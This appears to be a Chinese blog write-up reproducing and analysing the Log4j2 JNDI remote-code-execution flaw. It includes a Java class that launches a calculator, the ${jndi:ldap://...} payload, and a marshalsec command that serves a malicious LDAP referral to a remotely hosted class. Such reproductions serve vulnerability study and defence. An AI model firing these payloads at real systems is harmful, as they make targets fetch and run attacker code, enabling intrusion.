Log4j-2命令执行复现及分析

0x00 漏洞描述

Apache Log4j2是一个基于Java的日志记录框架。正常情况下,开发者可能会将错误信息写入日志中,可以利用此特点构造特殊的数据请求包,最终触发远程代码执行RCE漏洞。Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。

0x01 受影响版本

log4j2 2.0 - log4j2 2.15.0-rc1

0x02 漏洞复现

新建maven工程,pom.xml中引入log4j2依赖:

<dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-core</artifactId>
        <version>2.14.1</version>
    </dependency>
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-api</artifactId>
        <version>2.14.1</version>
    </dependency>

exp.java

public class exp {
    static{
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"gnome-calculator" };
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

该exp用于弹出计算器,验证命令执行效果。

test.java

import  org.apache.logging.log4j.LogManager;
import  org.apache.logging.log4j.Logger;


public class test {
    public static final Logger logger = LogManager.getLogger(test.class);


    public static void main(String[] args){
        logger.error("${jndi:ldap://192.168.65.233:9999/exp}");
    }
}

手动将exp.java生成字节码文件,并通过python搭建简易web用于外部访问:

038df5a8aaa17edcd19d8f8376f89420.png

再开一个恶意的ldap服务:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.65.233:9001/#exp" 9999

891b0fe6b9d4087c6da7a2bda1f6b712.png

运行test.java,可以看到ldap服务和web服务都有访问记录:

a66c51ee566bb16ff8f2ea5ccb83cf30.png

2014bf1389bb0342dee5a27e4b56ba66.png

并且有计算器弹出来,命令执行成功:

8607862006d2f1099c2b3a141abe115b.png

${jndi:ldap://qh48j1.dnslog.cn:9999/exp}这个payload高版本的java也会进行域名解析,可以看到dns请求记录:

1ddbff9bee3d7add5802c72d569b9ce5.png但是只有低版本的java才能执行命令。java版本在6u211、7u201、8u191及java11等更高版本的java中默认不能使用RMI或LDAP进行JNDI注入,因此较为安全。

0x03 漏洞分析

这次漏洞主要原因是log4j2提供的Lookup的功能,对于要输出的日志,提供了很多种查找的途径,JNDI只是其中一种。JDNI支持命名引用的方式,通过远程下载class文件来构建对象,最终造成命令执行。

这是目前JNDI Lookup方式的介绍:

b2ab60b050214b2a96ebb459c806b10a.png

其中增加了对来源class的限制。

0x04 最后

10号一早看到POC,拖到现在才发确实有些不好意思。

长按下方图片关注我们:

1fc73f678cba883125f5858856be9b70.jpeg

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值